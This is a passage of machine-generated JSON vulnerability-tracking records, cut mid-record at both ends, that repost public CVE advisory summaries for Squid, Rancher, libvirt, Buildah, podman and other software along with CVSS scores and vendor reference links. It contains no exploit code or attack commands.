Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-41317\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: An issue was discovered in Squid 4.9 through 4.17 and 5.0.6 through 5.6. Due to inconsistent handling of internal URIs, there can be Exposure of Sensitive Information about clients using the proxy via an HTTPS request to an internal cache manager URL. This is fixed in 5.7.\n\ud83d\udccf Published: 2022-12-25T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-14T18:34:22.370Z\n\ud83d\udd17 References:\n1. https://github.com/squid-cache/squid/security/advisories/GHSA-rcg9-7fqm-83mq\n2. http://www.squid-cache.org/Versions/v4/changesets/SQUID-2022_1.patch\n3. http://www.squid-cache.org/Versions/v5/changesets/SQUID-2022_1.patch\n4. https://www.openwall.com/lists/oss-security/2022/09/23/1", "creation_timestamp": "2025-04-14T18:54:15.000000Z"}, {"uuid": "edd4dced-7c28-49d8-8b8d-204ac04221aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H99M-6755-RGWC", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11997", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-22036\n\ud83d\udd25 CVSS Score: 9.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability has been identified within Rancher where a cluster or node driver can be used to escape the chroot\n jail and gain root access to the Rancher container itself. In \nproduction environments, further privilege escalation is possible based \non living off the land within the Rancher container itself. For the test\n and development environments, based on a \u2013privileged Docker container, \nit is possible to escape the Docker container and gain execution access \non the host system.\n\n\nThis issue affects rancher: from 2.7.0 before 2.7.16, from 2.8.0 before 2.8.9, from 2.9.0 before 2.9.3.\n\ud83d\udccf Published: 2025-04-16T08:37:54.218Z\n\ud83d\udccf Modified: 2025-04-16T08:37:54.218Z\n\ud83d\udd17 References:\n1. https://bugzilla.suse.com/show_bug.cgi?id=CVE-2024-22036\n2. https://github.com/rancher/rancher/security/advisories/GHSA-h99m-6755-rgwc", "creation_timestamp": "2025-04-16T08:55:56.000000Z"}, {"uuid": "e588e4f5-a55d-4cae-a005-0c1e03a523b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-64JQ-M7RQ-768H", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11996", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-32197\n\ud83d\udd25 CVSS Score: 6.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A Improper Privilege Management vulnerability in SUSE rancher in RoleTemplateobjects when external=true is set can lead to privilege escalation in specific scenarios.This issue affects rancher: from 2.7.0 before 2.7.14, from 2.8.0 before 2.8.5.\n\ud83d\udccf Published: 2025-04-16T08:40:54.464Z\n\ud83d\udccf Modified: 2025-04-16T08:40:54.464Z\n\ud83d\udd17 References:\n1. https://bugzilla.suse.com/show_bug.cgi?id=CVE-2023-32197\n2. https://github.com/rancher/rancher/security/advisories/GHSA-64jq-m7rq-768h", "creation_timestamp": "2025-04-16T08:55:56.000000Z"}, {"uuid": "d4f809f3-8e86-4d06-9fc6-7c9869035e0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4757", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11502", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-4418\n\ud83d\udd25 CVSS Score: 6.2 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A race condition leading to a stack use-after-free flaw was found in libvirt. Due to a bad assumption in the virNetClientIOEventLoop() method, the `data` pointer to a stack-allocated virNetClientIOEventData structure ended up being used in the virNetClientIOEventFD callback while the data pointer's stack frame was concurrently being \"freed\" when returning from virNetClientIOEventLoop(). The 'virtproxyd' daemon can be used to trigger requests. If libvirt is configured with fine-grained access control, this issue, in theory, allows a user to escape their otherwise limited access. This flaw allows a local, unprivileged user to access virtproxyd without authenticating. Remote users would need to authenticate before they could access it.\n\ud83d\udccf Published: 2024-05-08T03:03:05.135Z\n\ud83d\udccf Modified: 2025-04-11T22:03:18.932Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4351\n2. https://access.redhat.com/errata/RHSA-2024:4432\n3. https://access.redhat.com/errata/RHSA-2024:4757\n4. https://access.redhat.com/security/cve/CVE-2024-4418\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2278616", "creation_timestamp": "2025-04-11T22:51:32.000000Z"}, {"uuid": "36f1a38d-54d2-4719-a821-d99ac8595b09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4351", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11502", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-4418\n\ud83d\udd25 CVSS Score: 6.2 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A race condition leading to a stack use-after-free flaw was found in libvirt. Due to a bad assumption in the virNetClientIOEventLoop() method, the `data` pointer to a stack-allocated virNetClientIOEventData structure ended up being used in the virNetClientIOEventFD callback while the data pointer's stack frame was concurrently being \"freed\" when returning from virNetClientIOEventLoop(). The 'virtproxyd' daemon can be used to trigger requests. If libvirt is configured with fine-grained access control, this issue, in theory, allows a user to escape their otherwise limited access. This flaw allows a local, unprivileged user to access virtproxyd without authenticating. Remote users would need to authenticate before they could access it.\n\ud83d\udccf Published: 2024-05-08T03:03:05.135Z\n\ud83d\udccf Modified: 2025-04-11T22:03:18.932Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4351\n2. https://access.redhat.com/errata/RHSA-2024:4432\n3. https://access.redhat.com/errata/RHSA-2024:4757\n4. https://access.redhat.com/security/cve/CVE-2024-4418\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2278616", "creation_timestamp": "2025-04-11T22:51:32.000000Z"}, {"uuid": "fb25c506-3982-46d6-abb2-1429fc84bc19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4432", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11502", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-4418\n\ud83d\udd25 CVSS Score: 6.2 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A race condition leading to a stack use-after-free flaw was found in libvirt. Due to a bad assumption in the virNetClientIOEventLoop() method, the `data` pointer to a stack-allocated virNetClientIOEventData structure ended up being used in the virNetClientIOEventFD callback while the data pointer's stack frame was concurrently being \"freed\" when returning from virNetClientIOEventLoop(). The 'virtproxyd' daemon can be used to trigger requests. If libvirt is configured with fine-grained access control, this issue, in theory, allows a user to escape their otherwise limited access. This flaw allows a local, unprivileged user to access virtproxyd without authenticating. Remote users would need to authenticate before they could access it.\n\ud83d\udccf Published: 2024-05-08T03:03:05.135Z\n\ud83d\udccf Modified: 2025-04-11T22:03:18.932Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4351\n2. https://access.redhat.com/errata/RHSA-2024:4432\n3. https://access.redhat.com/errata/RHSA-2024:4757\n4. https://access.redhat.com/security/cve/CVE-2024-4418\n5. https://bugzilla.redhat.com/show_bug.cgi?id=2278616", "creation_timestamp": "2025-04-11T22:51:32.000000Z"}, {"uuid": "48b97893-c40e-4d42-861f-33f371360368", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R7V6-MFHQ-G3M2", "type": "published-proof-of-concept", "source": "Telegram/909Vqfy1t-GN-jmnJRhonTHruzsnwKWBWvcbC9dRm7P3pmc", "content": "", "creation_timestamp": "2026-01-02T18:47:00.000000Z"}, {"uuid": "f07a94e9-674d-4747-93d0-47061f8ee391", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-35PP-GGH6-C59C", "type": "published-proof-of-concept", "source": "Telegram/909Vqfy1t-GN-jmnJRhonTHruzsnwKWBWvcbC9dRm7P3pmc", "content": "", "creation_timestamp": "2026-01-02T18:47:00.000000Z"}, {"uuid": "325e7053-4bfa-4bee-a369-42328866035a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:3573", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11358", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-04-10T21:41:41.385Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2445\n18. https://access.redhat.com/errata/RHSA-2025:2449\n19. https://access.redhat.com/errata/RHSA-2025:2454\n20. https://access.redhat.com/errata/RHSA-2025:2701\n21. https://access.redhat.com/errata/RHSA-2025:2710\n22. https://access.redhat.com/errata/RHSA-2025:3301\n23. https://access.redhat.com/errata/RHSA-2025:3573\n24. https://access.redhat.com/security/cve/CVE-2024-9675\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-04-10T21:49:44.000000Z"}, {"uuid": "359a5cf7-43ba-4f9c-9276-dd911d11d0eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2449", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11358", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-04-10T21:41:41.385Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2445\n18. https://access.redhat.com/errata/RHSA-2025:2449\n19. https://access.redhat.com/errata/RHSA-2025:2454\n20. https://access.redhat.com/errata/RHSA-2025:2701\n21. https://access.redhat.com/errata/RHSA-2025:2710\n22. https://access.redhat.com/errata/RHSA-2025:3301\n23. https://access.redhat.com/errata/RHSA-2025:3573\n24. https://access.redhat.com/security/cve/CVE-2024-9675\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-04-10T21:49:44.000000Z"}, {"uuid": "dbd98959-e81a-449f-a168-7638991cf9b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M454-3XV7-QJ85", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11384", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-1386\n\ud83d\udd25 CVSS Score: 5.9 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: When using the ch-go library, under a specific condition when the query includes a large, uncompressed malicious external data, it is possible for an attacker in control of such data to smuggle another query packet into the connection stream.\n\ud83d\udccf Published: 2025-04-11T04:27:35.846Z\n\ud83d\udccf Modified: 2025-04-11T04:34:41.036Z\n\ud83d\udd17 References:\n1. https://github.com/ClickHouse/ch-go/security/advisories/GHSA-m454-3xv7-qj85", "creation_timestamp": "2025-04-11T04:49:36.000000Z"}, {"uuid": "a5a3182f-d111-4fe1-8781-da3360847b42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P228-4MRH-WW7R", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11440", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-46173\n\ud83d\udd25 CVSS Score: 7.2 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L)\n\ud83d\udd39 Description: Elrond-GO is a go implementation for the Elrond Network protocol. Versions prior to 1.3.50 are subject to a processing issue where nodes are affected when trying to process a cross-shard relayed transaction with a smart contract deploy transaction data. The problem was a bad correlation between the transaction caches and the processing component. If the above-mentioned transaction was sent with more gas than required, the smart contract result (SCR transaction) that should have returned the leftover gas, would have been wrongly added to a cache that the processing unit did not consider. The node stopped notarizing metachain blocks. The fix was actually to extend the SCR transaction search in all other caches if it wasn't found in the correct (expected) sharded-cache. There are no known workarounds at this time. This issue has been patched in version 1.3.50.\n\n\ud83d\udccf Published: 2022-12-28T06:27:55.036Z\n\ud83d\udccf Modified: 2025-04-11T15:46:02.255Z\n\ud83d\udd17 References:\n1. https://github.com/ElrondNetwork/elrond-go/security/advisories/GHSA-p228-4mrh-ww7r\n2. https://github.com/ElrondNetwork/elrond-go/pull/4718\n3. https://github.com/ElrondNetwork/elrond-go/commit/39d7ddcb08bb34217dab6daef7cd9d287fb8cab3", "creation_timestamp": "2025-04-11T15:50:45.000000Z"}, {"uuid": "b4a84d70-0d72-44ae-8aab-70e183460e86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:3989", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12325", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-12369\n\ud83d\udd25 CVSS Score: 4.2 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N)\n\ud83d\udd39 Description: A vulnerability was found in OIDC-Client. When using the RH SSO OIDC adapter with EAP 7.x or when using the elytron-oidc-client subsystem with EAP 8.x, authorization code injection attacks can occur, allowing an attacker to inject a stolen authorization code into the attacker's own session with the client with a victim's identity. This is usually done with a Man-in-the-Middle (MitM) or phishing attack.\n\ud83d\udccf Published: 2024-12-09T20:53:09.260Z\n\ud83d\udccf Modified: 2025-04-17T18:46:48.744Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:3989\n2. https://access.redhat.com/security/cve/CVE-2024-12369\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2331178", "creation_timestamp": "2025-04-17T18:58:08.000000Z"}, {"uuid": "80b6dc8f-d1e8-43f1-8ee4-6671fa80166d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XR9Q-H9C7-XW8Q", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11418", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23388\n\ud83d\udd25 CVSS Score: 8.2 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H)\n\ud83d\udd39 Description: A Stack-based Buffer Overflow vulnerability in SUSE rancher allows for denial of service.This issue affects rancher: from 2.8.0 before 2.8.13, from 2.9.0 before 2.9.7, from 2.10.0 before 2.10.3.\n\ud83d\udccf Published: 2025-04-11T10:48:51.349Z\n\ud83d\udccf Modified: 2025-04-11T10:48:51.349Z\n\ud83d\udd17 References:\n1. https://bugzilla.suse.com/show_bug.cgi?id=CVE-2025-23388\n2. https://github.com/rancher/rancher/security/advisories/GHSA-xr9q-h9c7-xw8q", "creation_timestamp": "2025-04-11T11:50:50.000000Z"}, {"uuid": "6841ba9f-a348-46fe-94a4-f9646d08f973", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-24CH-W38V-XMH8", "type": "published-proof-of-concept", "source": "Telegram/MkVFZOSBY6okxs0jz4r4sPLwgAxyLvM0u_fuhUsRVevVht8", "content": "", "creation_timestamp": "2026-01-08T12:01:07.000000Z"}, {"uuid": "71696c73-9b81-473a-b717-83e43c537c60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4JJ9-CGQC-X9H5", "type": "published-proof-of-concept", "source": "Telegram/MkVFZOSBY6okxs0jz4r4sPLwgAxyLvM0u_fuhUsRVevVht8", "content": "", "creation_timestamp": "2026-01-08T12:01:07.000000Z"}, {"uuid": "d0596108-6bc2-4749-a65a-4daf9b90c6f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4VC8-WVHW-M5GV", "type": "published-proof-of-concept", "source": "Telegram/MkVFZOSBY6okxs0jz4r4sPLwgAxyLvM0u_fuhUsRVevVht8", "content": "", "creation_timestamp": "2026-01-08T12:01:07.000000Z"}, {"uuid": "469d14f4-2d2a-400b-ad55-0753d5f7a438", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R64V-82FH-XC63", "type": "published-proof-of-concept", "source": "Telegram/MkVFZOSBY6okxs0jz4r4sPLwgAxyLvM0u_fuhUsRVevVht8", "content": "", "creation_timestamp": "2026-01-08T12:01:07.000000Z"}, {"uuid": "39e26e7b-9211-4a01-9dbc-d88a728e17ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MQ23-VVG7-XFM4", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11419", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23389\n\ud83d\udd25 CVSS Score: 8.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:L)\n\ud83d\udd39 Description: A Improper Access Control vulnerability in SUSE rancher allows a local user to impersonate other identities through SAML Authentication on first login.\nThis issue affects rancher: from 2.8.0 before 2.8.13, from 2.9.0 before 2.9.7, from 2.10.0 before 2.10.3.\n\ud83d\udccf Published: 2025-04-11T10:46:43.655Z\n\ud83d\udccf Modified: 2025-04-11T10:46:43.655Z\n\ud83d\udd17 References:\n1. https://bugzilla.suse.com/show_bug.cgi?id=CVE-2025-23389\n2. https://github.com/rancher/rancher/security/advisories/GHSA-mq23-vvg7-xfm4", "creation_timestamp": "2025-04-11T11:50:51.000000Z"}, {"uuid": "e93eda1e-f444-4868-88bf-03f652a23767", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5QMP-9X47-92Q8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11417", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23387\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\ud83d\udd39 Description: A Exposure of Sensitive Information to an Unauthorized Actor vulnerability in SUSE rancher allowed unauthenticated users to list all CLI authentication tokens and delete them before the CLI is able to get the token value.This issue affects rancher: from 2.8.0 before 2.8.13, from 2.9.0 before 2.9.7, from 2.10.0 before 2.10.3.\n\ud83d\udccf Published: 2025-04-11T10:52:44.866Z\n\ud83d\udccf Modified: 2025-04-11T10:52:44.866Z\n\ud83d\udd17 References:\n1. https://bugzilla.suse.com/show_bug.cgi?id=CVE-2025-23387\n2. https://github.com/rancher/rancher/security/advisories/GHSA-5qmp-9x47-92q8", "creation_timestamp": "2025-04-11T11:50:46.000000Z"}, {"uuid": "09523bc3-e874-4736-b4b2-529de6b8f83f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2456", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/12130", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11218\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in `podman build` and `buildah.` This issue occurs in a container breakout by using --jobs=2 and a race condition when building a malicious Containerfile. SELinux might mitigate it, but even with SELinux on, it still allows the enumeration of files and directories on the host.\n\ud83d\udccf Published: 2025-01-22T04:55:30.649Z\n\ud83d\udccf Modified: 2025-04-16T18:43:10.993Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0830\n2. https://access.redhat.com/errata/RHSA-2025:0878\n3. https://access.redhat.com/errata/RHSA-2025:0922\n4. https://access.redhat.com/errata/RHSA-2025:0923\n5. https://access.redhat.com/errata/RHSA-2025:1186\n6. https://access.redhat.com/errata/RHSA-2025:1187\n7. https://access.redhat.com/errata/RHSA-2025:1188\n8. https://access.redhat.com/errata/RHSA-2025:1189\n9. https://access.redhat.com/errata/RHSA-2025:1207\n10. https://access.redhat.com/errata/RHSA-2025:1275\n11. https://access.redhat.com/errata/RHSA-2025:1295\n12. https://access.redhat.com/errata/RHSA-2025:1296\n13. https://access.redhat.com/errata/RHSA-2025:1372\n14. https://access.redhat.com/errata/RHSA-2025:1453\n15. https://access.redhat.com/errata/RHSA-2025:1707\n16. https://access.redhat.com/errata/RHSA-2025:1713\n17. https://access.redhat.com/errata/RHSA-2025:1908\n18. https://access.redhat.com/errata/RHSA-2025:1910\n19. https://access.redhat.com/errata/RHSA-2025:1914\n20. https://access.redhat.com/errata/RHSA-2025:2441\n21. https://access.redhat.com/errata/RHSA-2025:2443\n22. https://access.redhat.com/errata/RHSA-2025:2454\n23. https://access.redhat.com/errata/RHSA-2025:2456\n24. https://access.redhat.com/errata/RHSA-2025:2701\n25. https://access.redhat.com/errata/RHSA-2025:2703\n26. https://access.redhat.com/errata/RHSA-2025:2710\n27. https://access.redhat.com/errata/RHSA-2025:2712\n28. https://access.redhat.com/errata/RHSA-2025:3577\n29. https://access.redhat.com/errata/RHSA-2025:3798\n30. https://access.redhat.com/security/cve/CVE-2024-11218\n31. https://bugzilla.redhat.com/show_bug.cgi?id=2326231", "creation_timestamp": "2025-04-16T18:56:07.000000Z"}, {"uuid": "55bfcf2a-852c-487e-88df-a3be3ed9167f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MHPG-C27V-6MXR", "type": "seen", "source": "Telegram/wglSmFthAobarYZ5lKlTDy3be09zcc68zd-F7c4mDs3nfFs", "content": "", "creation_timestamp": "2026-01-08T11:01:09.000000Z"}, {"uuid": "58a5570a-3008-4b88-9898-3e2f5f4c45d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7GRM-H62G-5M97", "type": "seen", "source": "Telegram/wglSmFthAobarYZ5lKlTDy3be09zcc68zd-F7c4mDs3nfFs", "content": "", "creation_timestamp": "2026-01-08T11:01:09.000000Z"}, {"uuid": "b1f52687-37b8-4464-90f5-21647e9c1fa0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M7J5-RQ9J-6JJ9", "type": "seen", "source": "Telegram/wglSmFthAobarYZ5lKlTDy3be09zcc68zd-F7c4mDs3nfFs", "content": "", "creation_timestamp": "2026-01-08T11:01:09.000000Z"}, {"uuid": "453dcb6f-19c0-423d-8441-d16ee7a58887", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2XM2-23FF-P8WW", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/11420", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32426\n\ud83d\udd25 CVSS Score: 4.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N)\n\ud83d\udd39 Description: Formie is a Craft CMS plugin for creating forms. Prior to version 2.1.44, it is possible to inject malicious code into the HTML content of an email notification, which is then rendered on the preview. There is no issue when rendering the email via normal means (a delivered email). This would require access to the form's email notification settings. This has been fixed in Formie 2.1.44.\n\ud83d\udccf Published: 2025-04-11T13:42:21.972Z\n\ud83d\udccf Modified: 2025-04-11T13:42:21.972Z\n\ud83d\udd17 References:\n1. https://github.com/verbb/formie/security/advisories/GHSA-2xm2-23ff-p8ww", "creation_timestamp": "2025-04-11T13:51:12.000000Z"}, {"uuid": "f9f118e7-e43f-4484-a69d-ae406405d382", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GG42-CV66-F5X7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12761", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32956\n\ud83d\udd25 CVSS Score: 8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 